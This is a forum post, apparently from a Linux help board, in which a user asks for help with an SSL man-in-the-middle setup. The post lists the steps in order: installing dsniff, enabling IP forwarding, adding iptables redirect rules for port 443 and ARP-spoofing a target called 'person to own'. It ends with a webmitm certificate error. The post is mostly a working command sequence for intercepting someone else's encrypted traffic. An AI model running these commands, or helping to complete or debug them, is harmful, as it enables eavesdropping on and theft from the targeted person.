Scheduled Maintenance: We are aware of an issue with Google, AOL, and Yahoo services as email providers which are blocking new registrations. We are trying to fix the issue and we have several internal and external support tickets in process to resolve the issue. Please see: viewtopic.php?t=158230

 

 

 

webmitm -d

Linux Kernel, Network, and Services configuration.
Post Reply
Message
Author
vali
Posts: 1
Joined: 2008-12-02 13:59
Contact:

webmitm -d

#1 Post by vali »

Hi, I want to sniff the ssl communication, I did this steps:

sudo apt-get install dsniff ssldump
sudo -s
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT
iptables -A FORWARD -j ACCEPT
arpspoof -t "target ip(person to own)" "gateway ip(router)"

webmitm -d ---here is problem

webmitm: error:0906D06C:PEM routines:PEM_read_bio:no start line: No such file or directory

I dont know what to do.
thanks for your answ

Post Reply